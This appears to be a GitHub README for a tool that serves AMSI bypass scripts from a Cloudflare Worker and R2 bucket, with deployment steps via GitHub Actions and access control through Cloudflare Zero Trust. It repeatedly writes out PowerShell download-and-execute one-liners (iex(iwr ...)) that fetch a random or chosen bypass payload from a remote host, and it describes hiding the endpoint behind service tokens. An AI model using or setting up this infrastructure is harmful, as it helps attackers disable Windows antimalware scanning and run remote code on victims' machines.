Easy access to your amsi bypass script with Cloudflare workers and R2 bucket. If no "payload id" is given, the workers will select one randomly.
Cloudflare worker function that selects a AMSI bypass file from a folder in a Cloudflare R2 bucket. The idea came from Flangvik AMSI.fail.
- Using Cloudflare Workers and R2 feature (free tier is enough)
- Protect your endpoint behind CF zero-trust (free for 1-50 users)
- Deploy with Github actions
- Cloudflare account (you will need your account id)
- Cloudflare API token. Doc here
- Create a R2 bucket
- In your new R2 bucket, create a folder which will contain your AMSI bypass scripts. And obviously... add your scripts in that folder.
- Fork or clone the project
- Setup Github secrets repository
- A domain setup in CF to use the custom domain feature.
- You don't have to do any modifcation in
wrangler.toml
(except if you want to change the name of your worker or if you don't want to use a custom domain). We are using Github secrets to setup thewrangler.toml
file.
note: to use without custom domain(not recommended), you will need to modify 2 things:
- remove the 3rd sed command in
.github/workflows/deploy.yml
- remove the route section in
wrangler.toml
# fork the project
# setup secrets, R2, etc.
git clone https://github.com/<your-user>/AMSI-R2.git
cd AMSI-R2
# ...
git push -u origin main
# go see your workers in cloudflare interface
# ex: random
curl "https://subdomain.yourdomain.com/<folder-name>"
iex(iwr -UseBasicParsing -Uri 'https://subdomain.yourdomain.com/<folder-name>');
# specific amsi bypass script
curl "https://subdomain.yourdomain.com/<folder-name>?payload=<the-payload-id>"
iex(iwr -UseBasicParsing -Uri 'https://subdomain.yourdomain.com/<folder-name>?payload=<the-payload-id>');
###
curl "https://amsi-r2.example.com/amsibypass"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass');
#
curl "https://amsi-r2.example.com/amsibypass?payload=2"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass?payload=2');
- Generate service auth token.
- Add worker domain in CF zero-trust application section. During the creation, setup a rule that allows your service token.
# curl command to access behind the zero-trust
curl "https://amsi-r2.example.com/amsibypass" -H "CF-Access-Client-Id: <your-CF-Access-Client-Id>" -H "CF-Access-Client-Secret: <your-CF-Access-Client-Secret>"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass' -Headers @{'CF-Access-Client-Id' = '<your-CF-Access-Client-Id>'; 'CF-Access-Client-Secret' = '<your-CF-Access-Client-Secret>'});
#
curl "https://amsi-r2.example.com/amsibypass?payload=2" -H "CF-Access-Client-Id: <your-CF-Access-Client-Id>" -H "CF-Access-Client-Secret: <your-CF-Access-Client-Secret>"
iex(iwr -UseBasicParsing -Uri 'https://amsi-r2.example.com/amsibypass?payload=2' -Headers @{'CF-Access-Client-Id' = '<your-CF-Access-Client-Id>'; 'CF-Access-Client-Secret' = '<your-CF-Access-Client-Secret>'});
Integrate the logic/obfuscation of AMSI.fail